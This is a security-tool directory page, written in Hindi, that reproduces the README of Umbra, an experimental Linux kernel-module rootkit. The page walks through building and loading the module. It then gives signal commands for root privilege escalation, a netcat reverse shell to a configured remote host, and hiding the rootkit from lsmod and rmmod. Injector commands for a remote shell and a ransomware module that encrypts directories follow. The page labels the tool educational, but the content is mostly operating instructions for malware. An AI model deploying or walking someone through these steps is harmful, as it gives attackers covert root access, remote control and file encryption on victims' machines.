Skip to content
KitploitKITPLOIT
उपकरणब्लॉग
जमा करें
उपकरणब्लॉग
जमा करें

हैकिंग, पेनटेस्ट और साइबर सुरक्षा उपकरण आपके सुरक्षा शस्त्रागार के लिए!

Kitploit हैकिंग, साइबर सुरक्षा और पेंटेस्टिंग टूल्स की एक निर्देशिका है। कमजोरियों को खोजने, सिस्टम का विश्लेषण करने, परीक्षण को स्वचालित करने और अपनी सुरक्षा को मजबूत करने के लिए नवीनतम प्रोजेक्ट अपडेट खोजें।

··फ़ीड·संपर्क·गोपनीयता·© 2026 Kitploit

टूल निर्देशिका

श्रेणियाँ

सभी श्रेणियाँ देखें
Loading categories
Umbra — एक LKM रूटकिट जो 4.x और 5.x कर्नेल संस्करणों को लक्षित करता है, जो एक बैकडोर खोलता है जो किसी रिमोट होस्ट पर रिवर्स शेल स्पॉन कर सकता है, मालवेयर लॉन्च कर सकता है और बहुत कुछ। | Kitploit
उपकरण/GitHubGitHub/h3xduck/umbra
विशेषाधिकार वृद्धिएन्क्रिप्शन/डिक्रिप्शन उपकरणस्थायित्व तंत्रआईडीएस/आईपीएस से बचनापोस्ट-शोषणकमांड एंड कंट्रोललर्निंग और शिक्षापेलोड डेवलपमेंटरिमोट एक्सेस ट्रोजन
GitHubh3xduck/umbra

Umbra

एक LKM रूटकिट जो 4.x और 5.x कर्नेल संस्करणों को लक्षित करता है, जो एक बैकडोर खोलता है जो किसी रिमोट होस्ट पर रिवर्स शेल स्पॉन कर सकता है, मालवेयर लॉन्च कर सकता है और बहुत कुछ।

136274 साल पहलेKitploit द्वारा समीक्षित

सबसे लोकप्रिय

सभी देखें →

हमारे समुदाय द्वारा सबसे अधिक उपयोग किए जाने वाले उपकरण खोजें।

सभी उपकरण खोजें

हमारे उपकरणों का संग्रह ब्राउज़ करें

सभी उपकरण देखें →
साझा करें
रिपॉजिटरी देखें

GitHub release (latest by date including pre-releases) Maintainability GitHub code size in bytes GitHub last commit

Umbra

Umbra एक प्रायोगिक (experimental) दूरस्थ रूप से नियंत्रणीय LKM रूटकिट है जो कर्नेल 4.x और 5.x (5.7 तक) के लिए है, जो एक नेटवर्क बैकडोर खोलता है जो दूरस्थ होस्ट्स पर रिवर्स शेल चला सकता है, दूरस्थ रूप से मैलवेयर लॉन्च कर सकता है और भी बहुत कुछ।

रूटकिट अभी भी विकासाधीन है, हालाँकि नीचे सूचीबद्ध विशेषताएँ पहले से ही पूरी तरह कार्यशील हैं।

Backdoor in action

नोट: इस रूटकिट को कर्नेल 5.4.0 और Ubuntu 18.04 का उपयोग करके विकसित और परीक्षण किया गया है।

Features

  • 🌟 बैकडोर जो किसी दुर्भावनापूर्ण TCP पैकेट को प्राप्त करने के बाद दूरस्थ IP पर रिवर्स शेल चलाता है।
  • 🌟 रूटकिट को दूरस्थ रूप से नियंत्रित करने के लिए Umbra Injector का उपयोग करें:
    • दूरस्थ रिवर्स शेल।
    • रूटकिट को दूरस्थ रूप से छिपाएँ/दिखाएँ।
    • Umbra Modules लॉन्च करें।
  • नया: Umbra Modules जोड़े गए हैं, ये विशेष मैलवेयर-जैसे मॉड्यूल हैं जो Umbra को बेहतर बनाते हैं और Umbra Injector द्वारा दूरस्थ रूप से लॉन्च किए जा सकते हैं।
  • नया: Umbra मॉड्यूल "Ransom" जो Umbra को दूरस्थ रूप से नियंत्रणीय रैनसमवेयर में बदल देता है।

Ransom module in action

  • Umbra अपनी सभी फाइलों और निर्देशिकाओं को ls जैसे उपयोगकर्ता कमांड्स से छिपा देता है।
  • Umbra सिग्नलों के माध्यम से खुद को दूरस्थ और स्थानीय रूप से छिपा/दिखा सकता है।
  • सिग्नल 50 भेजकर विशेषाधिकार वृद्धि (privilege escalation)।
  • मॉड्यूल लोड होने पर netcat रिवर्स शेल चलाएँ।
  • सिग्नल 51 भेजकर दूरस्थ होस्ट पर netcat रिवर्स शेल चलाएँ।

अधिक कार्यक्षमताएँ बाद के अपडेट्स में आएंगी।

Disclaimer

यह रूटकिट पूर्णतः शैक्षिक उद्देश्यों के लिए है। इसके अनिच्छित उपयोग से होने वाली किसी भी क्षति के लिए मैं जिम्मेदार नहीं हूँ।

यह भी ध्यान रखें कि Umbra केवल हल्के छिपाने और सुरक्षा तंत्रों को शामिल करता है। यह किसी वास्तविक परिदृश्य में उपयोग के लिए नहीं है।

महत्वपूर्ण: यदि आप इस रूटकिट को अपनी मशीन पर परीक्षण करने जा रहे हैं, तो मैं दृढ़ता से अनुशंसा करता हूँ कि VM का उपयोग करें।

Umbra Modules के बारे में: ransom मॉड्यूल एक साधारण एन्क्रिप्शन तंत्र का उपयोग करता है, लेकिन यह आपकी मशीन के किसी भी फोल्डर को एन्क्रिप्ट कर सकता है और निश्चित रूप से करेगा। हालाँकि फाइलों को आसानी से डिक्रिप्ट किया जा सकता है, मैं निश्चित रूप से अनुशंसा नहीं करता कि इसे अपने रूट फोल्डर या इसी तरह पर चलाएँ, जब तक कि नियंत्रित वातावरण में न हों।

Table of Contents

  1. निर्माण और स्थापना
  2. Umbra को अनलोड करना
  3. स्थानीय नियंत्रण
  4. Umbra Injector: दूरस्थ नियंत्रण
  5. Umbra Modules
    • (नया) Ransom
  6. संदर्भ

Build and install

याद रखें कि आपके पास 4.x या 5.x कर्नेल उपलब्ध होना चाहिए।

  1. अपने कर्नेल हेडर फाइलें डाउनलोड करें
root@kitploit:~
apt install linux-headers-$(uname -r)
  1. अपने include path को कर्नेल हेडर निर्देशिका (आमतौर पर /usr/src के अंतर्गत) को कवर करने के लिए कॉन्फ़िगर करें। यदि आप vscode का उपयोग कर रहे हैं, तो कौन सी निर्देशिकाएँ शामिल करनी हैं, इसका उदाहरण आप .vscode/c_cpp_properties.json में देख सकते हैं।

  2. प्रोजेक्ट क्लोन करें

root@kitploit:~
git clone https://github.com/h3xduck/Umbra.git
cd Umbra
  1. Umbra बनाएँ (Build करें)
root@kitploit:~
make
  1. Umbra को कर्नेल में लोड करें और पर्यावरण कॉन्फ़िगर करें स्क्रिप्ट Umbra को कर्नेल में स्थापित करेगी और एक विशेष निर्देशिका कॉन्फ़िगर करेगी जहाँ मैलवेयर मॉड्यूल संग्रहीत किए जाएँगे। यह निर्देशिका बाद में रूटकिट द्वारा छिपा दी जाएगी।
root@kitploit:~
sudo ./install.sh

यदि आपने पहले स्क्रिप्ट चलाई है और केवल Umbra को कर्नेल में स्थापित करना चाहते हैं, तो आप चला सकते हैं:

root@kitploit:~
sudo insmod ./umbra.ko

Unloading Umbra

सुनिश्चित करें कि Umbra अदृश्य मोड में नहीं है, अन्यथा यह विफल हो जाएगा।

root@kitploit:~
sudo rmmod umbra

Basic Usage: Local control

वर्तमान उपयोगकर्ता विशेषाधिकारों को root में बदलें

  • किसी भी PID को सिग्नल 50 भेजें।
root@kitploit:~
kill -50 1

IP:PORT पर रिवर्स netcat शेल प्रारंभ करें

  • रूटकिट बनाने से पहले अपना इच्छित IP और पोर्ट CONFIG.H में सेट करें। डिफ़ॉल्ट रूप से 127.0.0.1:5888

  • दूरस्थ होस्ट पर सुनना (listening) प्रारंभ करें।

root@kitploit:~
nc -lvp 5888
  • किसी भी PID को सिग्नल 51 भेजें। Umbra इसे पकड़ लेगा और शेल प्रारंभ कर देगा।
root@kitploit:~
kill -51 1

नोट: Umbra लोड होने पर भी रिवर्स शेल प्रारंभ करने का प्रयास करता है।

रूटकिट छिपाएँ - अदृश्य मोड

यह रूटकिट को lsmod जैसे कमांड्स द्वारा दिखाए जाने या rmmod के माध्यम से हटाए जाने से रोकेगा।

root@kitploit:~
kill -52 1

रूटकिट दिखाएँ (unhide)

यदि अदृश्य मोड सक्रिय है तो यह उसे वापस सामान्य कर देता है।

root@kitploit:~
kill -53 1

Umbra Injector: दूरस्थ नियंत्रण

बैकडोर के माध्यम से रिवर्स शेल प्राप्त करें

Umbra Injector को या तो Umbra स्थापित होने से पहले चलाया जा सकता है (इस प्रकार उसके चालू होते ही शेल मिल जाता है), या लक्ष्य प्रणाली पर Umbra स्थापित होने के बाद चलाया जा सकता है।

root@kitploit:~
./injector -S 127.0.0.1

बैकडोर निम्नलिखित पेलोड वाले पैकेट्स को सुनता है: UMBRA_PAYLOAD_GET_REVERSE_SHELL.

आप मेरी लाइब्रेरी RawTCP का उपयोग करके अपना स्वयं का injector भी बना सकते हैं।

रूटकिट को दूरस्थ रूप से छिपाएँ - अदृश्य मोड

यह रूटकिट को lsmod जैसे कमांड्स द्वारा दिखाए जाने या rmmod के माध्यम से हटाए जाने से रोकेगा।

root@kitploit:~
./injector -i 127.0.0.1

रूटकिट को दूरस्थ रूप से दिखाएँ (unhide)

यदि अदृश्य मोड सक्रिय है तो यह उसे वापस सामान्य कर देता है।

root@kitploit:~
./injector -u 127.0.0.1

सहायता

Umbra Injector को कैसे चलाएँ, इसकी पूरी जानकारी आप इसके द्वारा देख सकते हैं:

root@kitploit:~
./injector -h

Umbra Modules

Umbra Modules को install.sh स्क्रिप्ट द्वारा /tmp/umbra पर संग्रहीत किया जाएगा, जहाँ Umbra उन्हें छिपा देगा। यह निर्देशिका ls या समान कमांड्स द्वारा दिखाई नहीं देगी।

Ransom मॉड्यूल

यह मॉड्यूल Umbra Injector के माध्यम से दूरस्थ रैनसमवेयर-जैसे हमले लॉन्च कर सकता है। एन्क्रिप्टेड फाइलें .ubr एक्सटेंशन के साथ दिखाई देती हैं।

वर्तमान में एन्क्रिप्शन तंत्र एक साधारण बिट-स्तरीय NOP है, जो proof of concept के रूप में है। आप अपना स्वयं का एन्क्रिप्शन एल्गोरिदम शामिल करने के लिए मॉड्यूल को संपादित कर सकते हैं।

किसी निर्देशिका और उसकी सभी उप-निर्देशिकाओं को एन्क्रिप्ट करें

root@kitploit:~
./injector -p /Your/Path/To/Encrypt -e 127.0.0.1

किसी निर्देशिका और उसकी सभी उप-निर्देशिकाओं को डिक्रिप्ट करें

root@kitploit:~
./injector -p /Your/Path/To/Decrypt -d 127.0.0.1

संदर्भ

इस रूटकिट के विकास में LKMs और रूटकिट तकनीकों के बारे में काफी मात्रा में शोध शामिल था। निम्नलिखित मेरे द्वारा उपयोग किए गए संसाधनों की एक अपूर्ण सूची है: LKMs कैसे बनाएँ:

  • https://sysprog21.github.io/lkmpg/

Linux syscall संदर्भ:

  • https://syscalls64.paolostivanin.com/

कुछ रूटकिट संदर्भ:

  • https://xcellerator.github.io/posts/
  • https://web.archive.org/web/20160620231623/http://big-daddy.fr/repository/Documentation/Hacking/Security/Malware/Rootkits/writing-rootkit.txt
  • https://github.com/f0rb1dd3n/Reptile

लाइसेंस

यह प्रोजेक्ट GPLv2 लाइसेंस के अंतर्गत लाइसेंस प्राप्त है। LICENSE देखें।

टूल डाउनलोड करें